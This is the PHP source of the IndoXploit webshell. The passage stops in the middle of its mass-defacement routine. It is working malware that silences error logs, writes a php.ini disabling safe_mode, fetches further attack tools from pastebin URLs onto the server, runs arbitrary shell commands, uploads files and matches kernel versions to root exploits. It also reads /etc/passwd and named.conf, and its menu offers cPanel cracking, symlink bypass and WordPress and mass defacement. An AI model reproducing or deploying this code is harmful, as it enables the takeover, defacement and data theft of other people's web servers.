IndoXploit Webshell

1. <?php
2. @session_start();
3. @error_reporting(0);
4. @error_log(0);
5. @ini_set('error_log',NULL);
6. @ini_set('log_errors',0);
7. @ini_set('max_execution_time',0);
8. @ini_set('output_buffering',0);
9. @ini_set('display_errors', 0);
10. @set_time_limit(0);
11. @set_magic_quotes_runtime(0);
12. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
13.     @ob_clean();
14.     $file = $_GET['file'];
15.     header('Content-Description: File Transfer');
16.     header('Content-Type: application/octet-stream');
17.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
18.     header('Expires: 0');
19.     header('Cache-Control: must-revalidate');
20.     header('Pragma: public');
21.     header('Content-Length: ' . filesize($file));
22.     readfile($file);
23.     exit;
24. }
25. ?>
26. <html>
27. <head>
28. <title>IndoXploit</title>
29. <link href='https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png' rel='icon' type='image/x-icon'/>
30. <meta name='author' content='IndoXploit'>
31. <meta charset="UTF-8">
32. <style type='text/css'>
33. @import url(https://fonts.googleapis.com/css?family=Abel);
34. @import url(https://fonts.googleapis.com/css?family=Bad+Script);
35. html {
36.     background: #000000;
37.     color: #ffffff;
38.     font-family: 'Abel';
39.     font-size: 13px;
40.     width: 100%;
41. }
42. table, th, td {
43.     border-collapse:collapse;
44.     font-family: Tahoma, Geneva, sans-serif;
45.     background: transparent;
46.     font-family: 'Abel';
47.     font-size: 13px;
48. }
49. .table_home, .th_home, .td_home {
50.     border: 0px solid #ffffff;
51. }
52. .table_home a {
53.     text-decoration:none;
54. }
55. .table_home tr:hover {
56.     background-color: green;
57. }
58. th {
59.     padding: 10px;
60.     text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime;
61.     color: #00ff00;
62.     text-decoration: none;
63. }
64. a {
65.     color: #ffffff;
66.     text-decoration: none;
67. }
68. a:hover {
69.     color: gold;
70.     text-decoration: underline;
71.     text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime;
72.     color: #00ff00;
73.     text-decoration: none;
74. }
75. b {
76.     color: gold;
77. }
78. input[type=text], input[type=password],input[type=submit] {
79.     background: transparent;
80.     color: #ffffff;
81.     border: 1px solid #ffffff;
82.     margin: 5px auto;
83.     padding-left: 5px;
84.     font-family: 'Abel';
85.     font-size: 13px;
86. }
87. textarea {
88.     border: 1px solid #ffffff;
89.     width: 100%;
90.     height: 400px;
91.     padding-left: 5px;
92.     margin: 10px auto;
93.     resize: none;
94.     background: transparent;
95.     color: #ffffff;
96.     font-family: 'Abel';
97.     font-size: 13px;
98. }
99. select {
100.     background: transparent;
101.     color: #ffffff;
102.     border: 1px solid #ffffff;
103.     margin: 5px auto;
104.     padding-left: 5px;
105.     font-family: 'Abel';
106.     font-size: 13px;
107. }
108. .but {
109.     background: transparent;
110.     color: #ffffff;
111.     border: 1px solid #ffffff;
112.     margin: 5px auto;
113.     padding-left: 5px;
114.     font-family: 'Abel';
115.     font-size: 13px;
116. }
117. li a:hover{
118.     text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;
119.     color: #00ff00;
120.     text-decoration: none;
121. }
122. li {
123.     display: inline;
124.     margin: 5px;
125.     padding: 5px;
126. }
127. hr.gayane {
128.     height: 6px;
129.     background: url(http://c0de.esy.es/hrstyle.png) repeat-x 0 0;
130.     border: 0;
131. }
132. hr.style-two {
133. border: 0;
134. height: 1px;
135. background: #333;
136. background-image: -webkit-linear-gradient(left, #ccc, #333, #ccc);
137. background-image: -moz-linear-gradient(left, #ccc, #333, #ccc);
138. background-image: -ms-linear-gradient(left, #ccc, #333, #ccc);
139. background-image: -o-linear-gradient(left, #ccc, #333, #ccc);
140. }
141. #kotakan{
142.     margin:8px 2px 4px 2px;
143. }
144. #kotakan a{
145.     padding:4px 18px;
146.     margin:0;
147.     background:#001a00;
148.     text-decoration:none;
149.     letter-spacing:1px;
150. }
151. #kotakan a:hover{
152.     text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;
153.     color: #00e600;
154.     text-decoration: none;
155. }
156. </style>
157. </head>
158. <?php
159. if (file_exists("php.ini")){
160. }else{
161. $img = fopen('php.ini', 'w');
162. $sec = "safe_mode = OFF
163. disable_funtions = NONE";
164. fwrite($img ,$sec);
165. fclose($img);}
166. function w($dir,$perm) {
167.     if(!is_writable($dir)) {
168.         return "<font color=red>".$perm."</font>";
169.     } else {
170.         return "<font color=lime>".$perm."</font>";
171.     }
172. }
173.     function UrlLoop($url,$type){
174.  
175.         $urlArray = array();
176.  
177.         $ch = curl_init();
178.         curl_setopt($ch, CURLOPT_URL, $url);
179.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
180.         $result = curl_exec($ch);
181.  
182.         $regex='|<a.*?href="(.*?)"|';
183.         preg_match_all($regex,$result,$parts);
184.         $links=$parts[1];
185.         foreach($links as $link){
186.             array_push($urlArray, $link);
187.         }
188.         curl_close($ch);
189.  
190.         foreach($urlArray as $value){
191.             $paswot="$url$value";
192.             if(preg_match("#$type#is", $paswot)) {
193.                 echo "$paswot\r\n";
194.             }
195.         }
196.     }
197. function exe($cmd) {    
198. if(function_exists('system')) {        
199.         @ob_start();       
200.         @system($cmd);     
201.         $buff = @ob_get_contents();        
202.         @ob_end_clean();       
203.         return $buff;  
204.     } elseif(function_exists('exec')) {        
205.         @exec($cmd,$results);      
206.         $buff = "";        
207.         foreach($results as $result) {         
208.             $buff .= $result;      
209.         } return $buff;    
210.     } elseif(function_exists('passthru')) {        
211.         @ob_start();       
212.         @passthru($cmd);       
213.         $buff = @ob_get_contents();        
214.         @ob_end_clean();       
215.         return $buff;  
216.     } elseif(function_exists('shell_exec')) {      
217.         $buff = @shell_exec($cmd);     
218.         return $buff;  
219.     }
220. }
221. function perms($file){
222. $perms = fileperms($file);
223. if (($perms & 0xC000) == 0xC000) {
224. $info = 's';
225. } elseif (($perms & 0xA000) == 0xA000) {
226. $info = 'l';
227. } elseif (($perms & 0x8000) == 0x8000) {
228. $info = '-';
229. } elseif (($perms & 0x6000) == 0x6000) {
230. $info = 'b';
231. } elseif (($perms & 0x4000) == 0x4000) {
232. $info = 'd';
233. } elseif (($perms & 0x2000) == 0x2000) {
234. $info = 'c';
235. } elseif (($perms & 0x1000) == 0x1000) {
236. $info = 'p';
237. } else {
238. $info = 'u';
239. }
240. $info .= (($perms & 0x0100) ? 'r' : '-');
241. $info .= (($perms & 0x0080) ? 'w' : '-');
242. $info .= (($perms & 0x0040) ?
243. (($perms & 0x0800) ? 's' : 'x' ) :
244. (($perms & 0x0800) ? 'S' : '-'));
245. $info .= (($perms & 0x0020) ? 'r' : '-');
246. $info .= (($perms & 0x0010) ? 'w' : '-');
247. $info .= (($perms & 0x0008) ?
248. (($perms & 0x0400) ? 's' : 'x' ) :
249. (($perms & 0x0400) ? 'S' : '-'));
250. $info .= (($perms & 0x0004) ? 'r' : '-');
251. $info .= (($perms & 0x0002) ? 'w' : '-');
252. $info .= (($perms & 0x0001) ?
253. (($perms & 0x0200) ? 't' : 'x' ) :
254. (($perms & 0x0200) ? 'T' : '-'));
255. return $info;
256. }
257. function hdd($s) {
258. if($s >= 1073741824)
259. return sprintf('%1.2f',$s / 1073741824 ).' GB';
260. elseif($s >= 1048576)
261. return sprintf('%1.2f',$s / 1048576 ) .' MB';
262. elseif($s >= 1024)
263. return sprintf('%1.2f',$s / 1024 ) .' KB';
264. else
265. return $s .' B';
266. }
267. function ambilKata($param, $kata1, $kata2){
268.     if(strpos($param, $kata1) === FALSE) return FALSE;
269.     if(strpos($param, $kata2) === FALSE) return FALSE;
270.     $start = strpos($param, $kata1) + strlen($kata1);
271.     $end = strpos($param, $kata2, $start);
272.     $return = substr($param, $start, $end - $start);
273.     return $return;
274. }
275. if(get_magic_quotes_gpc()) {
276.     function idx_ss($array) {
277.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
278.     }
279.     $_POST = idx_ss($_POST);
280. }
281. function CreateTools($names,$lokasi){
282.     if ( $_GET['create'] == $names ){
283.         $a= "".$_SERVER['SERVER_NAME']."";
284. $b= dirname($_SERVER['PHP_SELF']);
285. $c = "/kontools/".$names.".php";
286. if (file_exists('kontools/'.$names.'.php')){
287.     echo '<script type="text/javascript">alert("Done");window.location.href = "kontools/'.$names.'.php";</script> ';
288.     }
289.     else {mkdir("kontools", 0777);
290. file_put_contents('kontools/'.$names.'.php', file_get_contents($lokasi));
291. echo ' <script type="text/javascript">alert("Done");window.location.href = "kontools/'.$names.'.php";</script> ';}}}
292. CreateTools("wso","http://pastebin.com/raw/baYwXD6d");
293. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
294. CreateTools("promailerv2","http://pastebin.com/raw/HqhHiwSB");
295. CreateTools("gamestopceker","http://pastebin.com/raw/CsNXy1S5");
296. CreateTools("bukapalapak","http://pastebin.com/raw/J3j4vyM1");
297. CreateTools("tokopedia","http://pastebin.com/raw/3DaHyA0M");
298. CreateTools("mailer","http://pastebin.com/raw/wjiH3qrt");
299. CreateTools("tokenpp","http://pastebin.com/raw/7mbXEYiG");
300. CreateTools("extractor","http://pastebin.com/raw/EeYFqka3");
301. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {    
302.     $status_work = '<font color="lime">Yey, Tool ini Dapat Digunakan Bro :)</font><br>';
303. } else {
304.     $status_work = '<font color="red">Tidak Dapat Digunakan Bro :(</font><br>';
305. }
306. if(isset($_GET['dir'])) {
307.     $dir = $_GET['dir'];
308.     chdir($_GET['dir']);
309. } else {
310.     $dir = getcwd();
311. }
312. function excute($cfe) {
313.   $res = '';
314.   if (!empty($cfe)) {
315.     if(@function_exists('exec')) {
316.       @exec($cfe,$res);
317.       $res = join("\n",$res);
318.     } elseif(@function_exists('shell_exec')) {
319.       $res = @shell_exec($cfe);
320.     } elseif(@function_exists('system')) {
321.       @ob_start();
322.       @system($cfe);
323.       $res = @ob_get_contents();
324.       @ob_end_clean();
325.     } elseif(@function_exists('passthru')) {
326.       @ob_start();
327.       @passthru($cfe);
328.       $res = @ob_get_contents();
329.       @ob_end_clean();
330.     } elseif(@is_resource($f = @popen($cfe,"r"))) {
331.       $res = "";
332.       while(!@feof($f)) { $res .= @fread($f,1024); }
333.       @pclose($f);
334.     } else { $res = "Ex() Disabled!"; }
335.   }
336.   return $res;
337. }
338. function root_vuln(){
339. $version_kernel=php_uname('r');
340. $version=explode('-', $version_kernel);
341. echo "<br>SystemKernel : ".php_uname('-a')."<br>";
342. $exploits = array(
343. 'w00t' =>'2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20',
344. 'brk' => '2.4.22','2.4.21','2.4.10','2.4.20',
345. 'elflbl' => '2.4.29',
346. 'expand_stack' => '2.4.29',
347. 'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12',
348. 'kdump' => '2.6.13',
349. 'km2' => '2.4.18','2.4.22',
350. 'krad' => '2.6.11',
351. 'krad3' => '2.6.11','2.6.9',
352. 'local26' =>'2.6.13',
353. 'mremap_pte'=>'2.4.20','2.2.25','2.4.24',
354. 'newlocal'=>'2.4.17','2.4.19',
355. 'ong_bak'=>'2.4.','2.6.',
356. 'ptrace'=>'2.2.24','2.4.22',
357. 'ptrace_kmod'=>'2.4.','2.6.',
358. 'ptrace24'=>'2.4.9',
359. 'pwned'=>'2.4.','2.6.',
360. 'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13',
361. 'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13',
362. 'prctl3'=>'2.6.13','2.6.17','2.6.9',
363. 'stackgrow2'=>'2.4.29','2.6.10',
364. 'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25',
365. 'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13',
366. 'prctl'=>'2.6.',
367. 'kmdx'=>'2.6.','2.4.');
368. $rootexploit = array_search($version[0], $exploits);
369. if($rootexploit==NULL){
370. echo "RootExploit : Tidak ada
371. RootExploit tersebut pada daftar kami";
372. }else{
373. echo "RootExploit : ".$rootexploit;
374. }
375.      }
376.   function showstat($stat) {
377.     if ($stat=="on") { return "<font color=lime>ON</font>"; }
378.     else { return "<font color=red>OFF</font>"; }
379.   }
380.   function named_conf(){
381.   if(@is_readable('/etc/named.conf')){ return "<font color=lime>READABLE</font>";
382.   }else { return "<font color=red>NOT READABLE</font>"; }
383.   }
384.   function passwd(){
385.   if(@is_readable('/etc/passwd')){ return "<font color=lime>READABLE</font>";
386.   }else { return "<font color=red>NOT READABLE</font>"; }
387.   }
388.   function testoracle() {
389.   if (@function_exists('ocilogon')) { return showstat("on"); }
390.   else { return showstat("off"); }
391.   }
392.   function testpostgresql() {
393.     if (@function_exists('pg_connect')) { return showstat("on"); }
394.     else { return showstat("off"); }
395.   }
396.   function testmssql() {
397.     if (@function_exists('mssql_connect')) { return showstat("on"); }
398.     else { return showstat("off"); }
399.   }
400.     function openbase_dir() {
401.     if ($openbase_dir=@ini_get('open_basedir')){ return "<font color=red>".$openbase_dir."</font>"; }
402.     else { return "<font color=lime>NONE</font>"; }
403.   }
404.     function testfetch() {
405.     if(excute('fetch --help')) { return showstat("on"); }
406.     else { return showstat("off"); }
407.   }
408.       function testsh() {
409.     if (excute('bash --help')) { return showstat("on"); }
410.     else { return showstat("off"); }
411.   }
412. $pwd=str_replace('\\', '/', dirname(__FILE__)).'/';
413. $dir = str_replace("\\","/",$dir);
414. $scdir = explode("/", $dir);
415. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON (ONOK SATPAME)</font>" : "<font color=lime>OFF (GANOK SATPAME)</font>";
416. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
417. $ds = @ini_get("disable_functions");
418. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
419. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
420. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
421. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
422. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
423. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
424. if(!function_exists('posix_getegid')) {
425.     $user = @get_current_user();
426.     $uid = @getmyuid();
427.     $gid = @getmygid();
428.     $group = "?";
429. } else {
430.     $uid = @posix_getpwuid(posix_geteuid());
431.     $gid = @posix_getgrgid(posix_getegid());
432.     $user = $uid['name'];
433.     $uid = $uid['uid'];
434.     $group = $gid['name'];
435.     $gid = $gid['gid'];
436. }
437. $d0mains = @file("/etc/named.conf");
438.             $users=@file('/etc/passwd');
439.         if($d0mains)
440.         {
441.             $count;  
442.             foreach($d0mains as $d0main)
443.             {
444.                 if(@ereg("zone",$d0main))
445.                 {
446.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
447.                     flush();
448.                     if(strlen(trim($domains[1][0])) > 2)
449.                     {
450.                         flush();
451.                         $count++;
452.                     }
453.                 }
454.             }
455.         }
456.  
457. $sport=$_SERVER['SERVER_PORT'];
458. echo "<table style='width:100%'>";
459. echo "<tr><td>Uname -a : <font color=lime>".php_uname()."</font></td></tr>";
460. echo "<tr><td>Software : <font color=lime>".@getenv("SERVER_SOFTWARE")."</font></td></tr>";
461. echo "<tr><td>User : <font color=lime>".$user."</font> (".$uid.") Group : <font color=lime>".$group."</font> (".$gid.")</td></tr>";
462. echo "<tr><td>Server IP : <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | My IP : <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
463. echo "<tr><td>HDD : <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
464. echo "<tr><td>Websites :<font color=lime> $count</font> Domains | Port :<font color=lime>  $sport</font></td></tr>";
465. echo "<tr><td>Safe Mode : $sm | Open_BaseDir : ".openbase_dir()." | /etc/named.conf : ".named_conf()." | /etc/passwd : ".passwd()."</td></tr>";
466. echo "<tr><td>Disable Functions : $show_ds</td></tr>";
467. echo "<tr><td>MySQL : $mysql | MSSQL : ".testmssql()." | PostgreSQL : ".testpostgresql()." | ORACLE : ".testoracle()." | PERL : $perl | PYTHON : $python | FETCH : ".testfetch()." | BASH : ".testsh()." | WGET : $wget | CURL : $curl </td></tr>";
468. echo "<tr><td>Posisi : ";
469. foreach($scdir as $c_dir => $cdir) {   
470.     echo "<a href='?dir=";
471.     for($i = 0; $i <= $c_dir; $i++) {
472.         echo $scdir[$i];
473.         if($i != $c_dir) {
474.         echo "/";
475.         }
476.     }
477.     echo "'>$cdir</a>/";
478. }
479. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
480. echo "</td></tr></table><hr class='gayane'>";
481. echo "<center>";
482. echo "<ul>";
483. echo "<li>[ <a href='?'>Home</a> ]</li>";
484. echo "<li>[ <a href='?dir=$dir&do=upload'>Aplot</a> ]</li>";
485. echo "<li>[ <a href='?dir=$dir&do=cmd'>Ngobrol</a> ]</li>";
486. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
487. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
488. echo "<li>[ <a href='?dir=$dir&do=jumping'>Loncat Indah</a> ]</li>";
489. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Toko Sabun</a> ]</li>";
490. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
491. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass /etc/passwd</a> ]</li><br>";
492. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Hunter</a> ]</li>";
493. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
494. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
495. echo "<li>[ <a href='?dir=$dir&do=erdipi'>Nggawe RDP</a> ]</li>";
496. echo "<li>[ <a href='?dir=$dir&do=erdipi2'>Nggawe RDP V.2</a> ]</li>";
497. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
498. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
499. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li><br>";
500. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
501. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
502. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
503. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
504. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
505. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li><br>";
506. echo "<li>[ <a href='?dir=$dir&do=magentot'>Magento Get Info</a> ]</li>";
507. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
508. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
509. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
510. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
511. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
512. echo "<li>[ <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> ]</li>";
513. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
514. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
515. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
516. echo "</ul>";
517. echo "</center>";
518. echo "<hr class='gayane'>";
519. if($_GET['do'] == 'upload') {
520.     echo "<center>";
521.     if($_POST['upload']) {
522.         if($_POST['tipe_upload'] == 'biasa') {
523.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
524.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
525.             } else {
526.                 $act = "<font color=red>failed to upload file</font>";
527.             }
528.         } else {
529.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
530.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
531.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
532.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
533.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
534.                 } else {
535.                     $act = "<font color=red>failed to upload file</font>";
536.                 }
537.             } else {
538.                 $act = "<font color=red>failed to upload file</font>";
539.             }
540.         }
541.     }
542.     echo "Pilihen salah siji :
543.    <form method='post' enctype='multipart/form-data'>
544.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
545.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
546.    <input type='file' name='ix_file'>
547.    <input type='submit' value='upload' name='upload'>
548.    </form>";
549.     echo $act;
550.     echo "</center>";
551. }
552. elseif($_GET['do'] == 'endec') {
553. $text = $_POST['code'];
554. echo "<center>
555. <form method='post'><br>
556. <textarea placeholder='MASUKIN TEXT YANG MAU DI ENCRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
557. <select class='inputz' size='1' name='ope'>
558. <option value='urlencode'>url</option>
559. <option value='json'>json</option>
560. <option value='ur'>convert_uu</option>
561. <option value='base64'>Base64</option>
562. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
563. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
564. <option value='coeg'>gzinflate - base64</option>
565. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
566. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
567. <option value='str2'>str_rot13 - base64</option>
568. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
569. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
570. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 -  base64</option>
571. <option value='gzpress'>gzcompress - base64</option>
572. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
573. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
574. </form>";
575. $submit = $_POST['submit'];
576. if (isset($submit)){
577. $op = $_POST["ope"];
578. switch ($op) {case 'base64': $codi=base64_encode($text);
579. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
580. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
581. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
582. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
583. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
584. break;case 'urlencode' : $codi=rawurlencode($text);
585. break;case 'ur' : $codi=convert_uuencode($text);
586. break;case 'json' : $codi=json_encode(utf8_encode($text));
587. break;case 'str2' : $codi=base64_encode(str_rot13($text));
588. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
589. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
590. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
591. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
592. break;default:break;}}
593. $submit = $_POST['submits'];
594. if (isset($submit)){
595. $op = $_POST["ope"];
596. switch ($op) {case 'base64': $codi=base64_decode($text);
597. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
598. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
599. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
600. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
601. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
602. break;case 'urlencode' : $codi=rawurldecode($text);
603. break;case 'ur' : $codi=convert_uudecode($text);
604. break;case 'json' : $codi=utf8_decode(json_decode($text));
605. break;case 'str2' : $codi=str_rot13(base64_decode($text));
606. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
607. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
608. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
609. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
610. break;default:break;}}
611. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
612. fwrite($myfile, $codi);
613. fclose($myfile);
614. echo "<center><div id='kotakan'><br>
615. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
616. }
617.  elseif($_GET['do'] == 'cmd') {
618.     echo "<form method='post'>
619.     <font style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
620.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
621.     </form>";
622.     if($_POST['do_cmd']) {
623.         echo "<pre>".exe($_POST['cmd'])."</pre>";
624.     }
625. } elseif($_GET['do'] == 'mass_deface') {
626.     echo "<center><form action=\"\" method=\"post\">\n";
627.     $dirr=$_POST['d_dir'];
628.     $index = $_POST["script"];
629.     $index = str_replace('"',"'",$index);
630.     $index = stripslashes($index);
631.     function edit_file($file,$index){
632.         if (is_writable($file)) {
633.         clear_fill($file,$index);
634.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
635.         }
636.         else {
637.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
638.             }
639.             }
640.     function hapus_massal($dir,$namafile) {
641.         if(is_writable($dir)) {
642.             $dira = scandir($dir);
643.             foreach($dira as $dirb) {
644.                 $dirc = "$dir/$dirb";
645.                 $lokasi = $dirc.'/'.$namafile;
646.                 if($dirb === '.') {
647.                     if(file_exists("$dir/$namafile")) {
648.                         unlink("$dir/$namafile");
649.                     }
650.                 } elseif($dirb === '..') {
651.                     if(file_exists("".dirname($dir)."/$namafile")) {
652.                         unlink("".dirname($dir)."/$namafile");
653.                     }
654.                 } else {
655.                     if(is_dir($dirc)) {
656.                         if(is_writable($dirc)) {
657.                             if(file_exists($lokasi)) {
658.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
659.                                 unlink($lokasi);
660.                                 $idx = hapus_massal($dirc,$namafile);
661.                             }
662.                         }
663.                     }
664.                 }
665.             }
666.         }
667.     }
668.     function clear_fill($file,$index){
669.         if(file_exists($file)){
670.             $handle = fopen($file,'w');
671.             fwrite($handle,'');
672.             fwrite($handle,$index);
673.             fclose($handle);  } }
674.  
675.     function gass(){
676.         global $dirr , $index ;
677.         chdir($dirr);
678.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
679.         $files = scandir($dirr) ;
680.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
681.         sort($files);
682.         $n = 0 ;
683.         foreach ($files as $file){
684.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
685.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
686.                 edit_file($file,$index);
687.                 flush();
688.                 $n = $n +1 ;
689.                 }
690.                 }
691.                 echo "<br>";
692.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
693.                     }
694.     function ListFiles($dirrall) {
695.  
696.     if($dh = opendir($dirrall)) {
697.  
698.        $files = Array();
699.        $inner_files = Array();
700.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
701.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
702.         while($file = readdir($dh)) {
